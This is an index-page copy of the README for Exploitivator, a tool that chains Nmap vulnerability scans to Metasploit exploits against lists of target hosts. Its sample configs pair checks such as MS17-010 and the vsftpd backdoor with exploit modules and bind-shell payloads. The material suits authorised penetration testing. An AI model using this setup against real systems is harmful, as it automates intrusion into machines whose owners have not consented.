Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/N1ckDunn/Exploitivator

Automate Metasploit scanning and exploitation
https://github.com/N1ckDunn/Exploitivator

Last synced: 21 days ago
JSON representation

Automate Metasploit scanning and exploitation

Awesome Lists containing this project

README

        

Exploitivator
=============
V2.0 - modified to use Python 3

Prerequisites
-------------
This has only been tested on Kali.

It depends on the pymetasploit3 module for Python, described in detail here:
https://coalfire.com/the-coalfire-blog/pymetasploit3-metasploit-automation-library

Install the necessary Kali packages and the PostgreSQL gem for Ruby:

apt-get install postgresql libpq-dev git-core

gem install pg

Install current version of the pymetasploit3 Python 3 module:
pip3 install pymetasploit3

Usage
-----
Before running either of the scripts, load msfconsole and start the MSGRPC service.
MSGRPC can be started with msfrpcd in Metasploit as follows:
load msgrpc Pass=abc123 ServerHost=0.0.0.0 ServerPort=55552

The results of scans and/or exploitation will appear in the Metasploit console and in the ouput file(s) (msf_scan_output.txt and exploitivator_output.txt).

Use MSFScan to run multiple Metasploit scans against a group of target hosts.
Use Exploitivator to run Nmap script scans against a group of target hosts and automatically exploit any reported as vulnerable.

Exploitivator
-------------
Command line usage:

Examples:
The application can be run as follows, where '10.128.108.178' is the IP address of the attack machine, 'hosts.txt' is a list of target hosts, 'msf' is the Metasploit Postgres username and 'abc123' is the Metasploit Postgres password:
./exploitivator.py -l 10.128.108.178 -f hosts.txt -u msf -m abc123

MSFScan
-------
Command line usage:
./msf_scan.py filename
./msf_scan.py filename MSF_DB_Username MSF_DB_Password

Examples:
The application can be run as follows, where 'hosts.txt' is a list of target hosts, 'msf' is the Metasploit Postgres username and 'abc123' is the Metasploit Postgres password:
./msf_scan.py hosts.txt msf abc123

To run with 'hosts.txt' as a list of target hosts, using the script's default Metasploit Postgres username(msf) and the script's default Metasploit Postgres password(abc123):
./msf_scan.py hosts.txt

Config Files
------------
Both scripts rely on config files to provide details of required Nmap and Metasploit scamns and attacks.

MSFScan
-------
The script uses a config file with the name 'scan_types.cfg'. This contains a list of paths for any Metasploit scans the are to run against the targets.
e.g.:
auxiliary/scanner/dcerpc/endpoint_mapper
auxiliary/scanner/smb/smb_version
auxiliary/scanner/x11/open_x11
auxiliary/scanner/discovery/ipv6_multicast_ping
auxiliary/scanner/discovery/ipv6_neighbor
auxiliary/scanner/smb/smb_login

Exploitivator
-------------
This script uses two config files(exploitivator_scan.cfg and exploitivator.cfg). One to specify Nmap scans and parameters(exploitivator_scan.cfg), and one to specify Metasploit payloads and parameters(exploitivator.cfg).
These use '##' as a separator and have the following formats.

exploitivator_scan.cfg:
[Label]##[Nmap command line parameters]##[Nmap command line parameters for file output]##[Optional - grep command to be used if Nmap's greppable output is being used]

In the above format:
1) The first section is a label linking the scan to the exploit
2) The second section is the part of the Namp command line which specifies details of the type of scan to run, such as port and script
3) The third section is the part of the Namp command line that defines the Nmap output file (Exploitivator handles XML or greppable Nmap output)
4) The optional fourth section is the gep command that you wish to use in order to identify a vulnerable target within a '.gnmap' file

An example file content is shown below:
SMB_08-067##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms08-067.nse##-oX ms_08_067.xml
SMB_09-050##-p U:137,U:139,T:139,T:445 --script smb-vuln-cve2009-3103.nse##-oX ms_09_050.xml
SMB_10-054##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-054.nse##-oX ms_10_054.xml
SMB_10-061##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-061.nse##-oX ms_10_061.xml
SMB_17-010##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms17-010##-oX ms_17_010.xml
DistCC##-p 3632 -sSV##-oG distcc.gnmap##grep "3632\/open\/tcp\/\/distccd"
JavaRMI##-p 1099 -sSV##-oG javarmi.gnmap##grep "1099\/open\/tcp\/\/rmi
VSFTPBackDoor##-p 21 -sSV##-oG vsftp_backdoor.gnmap##grep "vsftpd 2.3.4"

exploitivator.cfg:
[Label]##[Metasploit exploit path]##[Optional - Metasploit payload details]

An example file content is shown below:
SMB_08-067##exploit/windows/smb/ms08_067_netapi##windows/meterpreter/bind_tcp
SMB_09-050##exploit/windows/smb/ms09_050_smb2_negotiate_func_index##windows/meterpreter/bind_tcp
SMB_10-061##exploit/windows/smb/ms10_061_spoolss##windows/meterpreter/bind_tcp
SMB_17-010##exploit/windows/smb/ms17_010_eternalblue##windows/meterpreter/bind_tcp
DistCC##exploit/unix/misc/distcc_exec##cmd/unix/bind_ruby
JavaRMI##exploit/multi/misc/java_rmi_server##php/meterpreter/bind_tcp
VSFTPBackDoor##exploit/unix/ftp/vsftpd_234_backdoor##none

References
----------

Starting and connecting to MSGRPC:
https://coalfire.com/the-coalfire-blog/pymetasploit3-metasploit-automation-library

Setting RHOSTS to use a file instead of a range:
http://travisaltman.com/metasploit-set-rhosts-file/